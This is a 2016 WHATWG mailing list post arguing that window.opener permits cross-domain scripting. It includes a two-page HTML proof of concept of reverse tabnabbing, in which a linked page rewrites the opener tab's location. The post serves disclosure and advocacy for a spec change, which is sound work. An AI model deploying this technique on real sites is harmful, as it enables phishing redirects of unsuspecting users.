- From: Michael A. Peters <mpeters@domblogger.net>
- Date: Wed, 30 Nov 2016 19:33:48 -0800
- To: whatwg@lists.whatwg.org
On 11/30/2016 06:21 PM, Michael A. Peters wrote:
> On 11/30/2016 05:23 PM, Ian Hickson wrote:
>> On Wed, Nov 30, 2016 at 4:49 PM Michael A. Peters
>> <mpeters@domblogger.net>
>> wrote:
>>
>>>
>>> Right now the specification for window.opener() is seriously insecure,
>>> allowing for cross-domain script access by default.
>>>
>>
>> I believe that's a bit of an overstatement. There are certainly risks
>> involved in window.opener (they're briefly discussed in the spec itself),
>> but it doesn't remove the origin checks.
>>
>>
>
> Actually it does. Site A can link to Site B on a completely different
> domain and JavaScript on Site B has access to the window for Site A and
> can change the URL and other things.
>
Here is easy demo showing the blatant cross-domain scripting vulnerability.
<!-- put this page as a.html on foo.com -->
<html>
<head>
<title>Test target link</title>
</head>
<body>
<p><a href="https://bar.net/b.html" target="_blank">link to
different domain</a></p>
</body>
</html>
<!-- put this page as b.html on bar.net -->
<html>
<head>
<title>Test window.opener</title>
<script type="text/javascript" >
if (window.opener && !window.opener.closed)
opener.location = 'http://www.example.org/'
</script>
</head>
<body>
<p>The page on foo.com will have changed to http://www.example.org/
because this page had script access to that window. Obvious very serious
phishing concern, and probably other concerns</p>
</body>
</html>
Received on Thursday, 1 December 2016 03:34:21 UTC